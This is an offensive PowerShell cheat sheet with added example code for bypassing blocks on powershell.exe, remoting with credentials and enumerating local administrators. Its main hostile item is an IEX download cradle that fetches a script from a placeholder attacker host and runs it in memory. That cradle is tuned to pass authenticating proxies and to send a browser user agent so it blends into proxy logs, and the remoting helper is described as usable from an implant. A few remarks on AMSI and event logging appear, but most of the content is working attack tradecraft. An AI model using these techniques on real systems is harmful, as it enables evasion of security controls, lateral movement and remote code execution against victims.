PowerShell

Bypasses for running PowerShell

When powershell.exe itself is blocked or watched, the usual alternatives are:

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  # 32-bit host; rules and monitoring keyed on the System32 path or the 64-bit image miss it

Custom EXEs that host the engine through System.Management.Automation.dll, so powershell.exe never starts:
UnmanagedPowerShell
NotPowerShell
PSAttack  # can bundle your own modules into the binary, very useful
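As an added example (not code from the original page), a check to run after launching any of the hosts above, so you know what you actually landed in. The 32-bit path only helps against controls that key on the System32 path or the 64-bit image: the language mode is set by system policy (AppLocker/WDAC script enforcement) and is the same in both hosts, so a 32-bit console that still reports ConstrainedLanguage has bypassed nothing. Paths are built from $env:windir rather than hard-coded.

```powershell
# Added example, not part of the original page.
function Get-PSHostInfo {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $isAdmin = ([Security.Principal.WindowsPrincipal]$id).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)

    [PSCustomObject]@{
        HostPath     = (Get-Process -Id $PID).Path
        Is64BitProc  = [Environment]::Is64BitProcess
        Is64BitOS    = [Environment]::Is64BitOperatingSystem
        PSVersion    = $PSVersionTable.PSVersion.ToString()
        # FullLanguage is what you want. ConstrainedLanguage means AppLocker/WDAC
        # script enforcement is active and the bitness trick changed nothing.
        LanguageMode = $ExecutionContext.SessionState.LanguageMode.ToString()
        ExecPolicy   = (Get-ExecutionPolicy).ToString()
        IsAdmin      = $isAdmin
    }
}

# Resolve both hosts from whatever process you are in. From a 32-bit process on
# 64-bit Windows, "System32" is redirected to SysWOW64 by WOW64, so the 64-bit
# binary has to be reached through the Sysnative alias instead.
$x86Host = Join-Path $env:windir 'SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
$x64Host = if ([Environment]::Is64BitProcess) {
    Join-Path $env:windir 'System32\WindowsPowerShell\v1.0\powershell.exe'
} else {
    Join-Path $env:windir 'Sysnative\WindowsPowerShell\v1.0\powershell.exe'
}

Get-PSHostInfo | Format-List

# Spawn the 32-bit host and ask it the same two questions. Single quotes keep
# the $ from being expanded by the parent shell.
if (Test-Path $x86Host) {
    & $x86Host -NoProfile -NonInteractive -Command '[Environment]::Is64BitProcess; $ExecutionContext.SessionState.LanguageMode'
}
```

If the child prints False followed by FullLanguage, the 32-bit host is usable; False followed by ConstrainedLanguage means policy applies to both binaries and you need one of the SMA.dll hosts above or a different route.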

Enter-PSSession

Can have mixed results; see Microsoft's Enter-PSSession documentation for the prerequisites.

# Remote01 and remoteadmin are placeholders. The target needs WinRM enabled
# (Enable-PSRemoting) and the account must be a local administrator or a member
# of Remote Management Users on it.
$password = ConvertTo-SecureString "PasswordPassword123!!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("remoteadmin", $password)
Enter-PSSession -ComputerName Remote01 -Credential $cred
[Remote01]: PS C:\Users\remoteadmin\Documents> whoami
Remote01\remoteadmin
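The "mixed results" usually come down to three things: the WinRM port is filtered, the client refuses NTLM to a target it cannot verify (a non-domain host that is not in WSMan:\localhost\Client\TrustedHosts), or Enter-PSSession is being called from a script, where it opens the session but the following lines still run locally because the interactive prompt is what gets redirected. The added example below (not from the original page; Remote01 and remoteadmin are placeholders) checks the first two before connecting and uses a persistent session with Invoke-Command for anything non-interactive.

```powershell
# Added example, not part of the original page.
function Test-PSRemoting {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][pscredential]$Credential,
        [switch]$UseSSL
    )
    $port = if ($UseSSL) { 5986 } else { 5985 }

    # 1. Is the WinRM listener reachable? Fails fast instead of waiting for the
    #    Enter-PSSession timeout when a host firewall drops the port.
    $tcp = Test-NetConnection -ComputerName $ComputerName -Port $port -WarningAction SilentlyContinue
    if (-not $tcp.TcpTestSucceeded) { return "tcp/$port closed or filtered" }

    # 2. Does WinRM answer and accept the credential? Against a non-domain target
    #    Negotiate falls back to NTLM, which the client refuses unless the host is
    #    in TrustedHosts or the connection is over SSL.
    try {
        Test-WSMan -ComputerName $ComputerName -Credential $Credential -Authentication Negotiate -UseSSL:$UseSSL -ErrorAction Stop | Out-Null
        return 'ok'
    } catch {
        return "wsman failed: $($_.Exception.Message)"
    }
}

function Invoke-RemoteCommand {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][pscredential]$Credential,
        [Parameter(Mandatory)][scriptblock]$ScriptBlock
    )
    # Enter-PSSession only makes sense at an interactive prompt. From a script,
    # scheduled task or implant, a persistent session plus Invoke-Command gives the
    # same access, works non-interactively, and reuses one authenticated connection.
    $session = New-PSSession -ComputerName $ComputerName -Credential $Credential -ErrorAction Stop
    try {
        Invoke-Command -Session $session -ScriptBlock $ScriptBlock
    } finally {
        # Always tear the session down: leftovers count against the target's shell
        # quotas and stay visible to Get-PSSession and to defenders.
        Remove-PSSession -Session $session
    }
}

# Usage (placeholder host and account):
$cred = Get-Credential 'Remote01\remoteadmin'
Test-PSRemoting -ComputerName Remote01 -Credential $cred
Invoke-RemoteCommand -ComputerName Remote01 -Credential $cred -ScriptBlock {
    whoami; $env:COMPUTERNAME; $PSVersionTable.PSVersion.ToString()
}
```

Whatever runs inside the script block executes on the target and is logged there: a network logon (Security 4624, logon type 3) and, if script block logging is enabled, the block's content in PowerShell/Operational 4104.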

Useful one-liners

Retrieve Local Administrators
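The quick versions are `net localgroup administrators` or `Get-LocalGroupMember -Group Administrators`. The added example below (not from the original page) is locale-independent, since it addresses the group by its well-known SID rather than its display name, and still works where the LocalAccounts module is missing, which includes the 32-bit host on 64-bit Windows and any remote machine.

```powershell
# Added example, not part of the original page.
function Get-LocalAdmins {
    param([string]$ComputerName = $env:COMPUTERNAME)

    # S-1-5-32-544 is BUILTIN\Administrators on every Windows install, whatever
    # the display language or a hardening baseline renamed the group to.
    $adminSid = New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-32-544'

    # Microsoft.PowerShell.LocalAccounts (Get-LocalGroupMember) ships with Windows
    # PowerShell 5.1, but it is not loadable from the 32-bit host on 64-bit Windows
    # and only queries the local machine. ADSI/WinNT covers both cases.
    $useModule = ($ComputerName -eq $env:COMPUTERNAME) -and
                 (Get-Command Get-LocalGroupMember -ErrorAction SilentlyContinue)
    if ($useModule) {
        Get-LocalGroupMember -SID $adminSid |
            Select-Object Name, ObjectClass, PrincipalSource, @{ n = 'SID'; e = { $_.SID.Value } }
        return
    }

    $groupName = $adminSid.Translate([System.Security.Principal.NTAccount]).Value.Split('\')[-1]
    $group = [ADSI]"WinNT://$ComputerName/$groupName,group"
    foreach ($member in $group.psbase.Invoke('Members')) {
        # Members come back as raw COM objects; read their properties via InvokeMember.
        $adsPath  = $member.GetType().InvokeMember('ADsPath',   'GetProperty', $null, $member, $null)
        $class    = $member.GetType().InvokeMember('Class',     'GetProperty', $null, $member, $null)
        $sidBytes = $member.GetType().InvokeMember('objectSid', 'GetProperty', $null, $member, $null)
        [PSCustomObject]@{
            Name        = ($adsPath -replace '^WinNT://', '') -replace '/', '\'
            ObjectClass = $class
            # A SID with no resolvable name is an orphan: a deleted domain account or
            # a stale local admin that nobody cleaned up. Worth noting either way.
            SID         = (New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)).Value
        }
    }
}

Get-LocalAdmins | Format-Table -AutoSize
# Remote query through the ADSI path (placeholder host):
# Get-LocalAdmins -ComputerName Remote01 | Format-Table -AutoSize
```

The remote form needs the Remote Registry/SAM-R path open to the target (tcp/445) and a credential that can read the SAM, which local administrators or, on older builds, any domain user typically can.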

Download Cradle
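The classic cradle is `IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_HOST/script.ps1')`, or `IEX (Invoke-WebRequest -UseBasicParsing 'http://ATTACKER_HOST/script.ps1').Content` where WebClient is blocked. The added example below (not from the original page; ATTACKER_HOST and the script name are placeholders) makes the parts that usually break in a real network explicit: TLS version, the corporate proxy, and the empty default user agent.

```powershell
# Added example, not part of the original page.
function Get-RemoteScript {
    param(
        [Parameter(Mandatory)][string]$Url,
        [string]$UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    )
    # Older .NET defaults to SSL3/TLS 1.0, which current web servers reject.
    # OR in TLS 1.2 without removing whatever is already enabled.
    [Net.ServicePointManager]::SecurityProtocol =
        [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12

    $wc = New-Object Net.WebClient
    # Pick up the logged-on user's proxy and hand it their credentials; otherwise
    # the download dies with a 407 behind an authenticating corporate proxy.
    $wc.Proxy = [Net.WebRequest]::GetSystemWebProxy()
    $wc.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
    # WebClient sends no User-Agent by default, which stands out in proxy logs.
    $wc.Headers.Add('User-Agent', $UserAgent)

    # Returned as a string: nothing is written to disk.
    $wc.DownloadString($Url)
}

# Usage (placeholder URL). IEX executes the text in the current scope, so any
# functions the downloaded script defines are available afterwards.
# IEX (Get-RemoteScript -Url 'http://ATTACKER_HOST/script.ps1')
```

"In memory" does not mean "unlogged": when the downloaded text executes, AMSI scans it, and with script block logging enabled the full decoded content lands in PowerShell/Operational event 4104 on the host.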
